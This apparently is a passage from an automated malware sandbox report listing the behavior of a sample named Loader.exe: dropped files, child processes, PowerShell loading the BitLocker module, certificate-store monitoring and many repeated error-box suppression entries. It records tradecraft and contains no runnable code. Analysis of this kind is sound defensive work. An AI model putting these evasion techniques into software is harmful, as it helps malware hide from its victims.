                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,12_2_00007FF7600A1684
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\README.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txtJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\Root
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess information set: NOOPENFILEERRORBOX
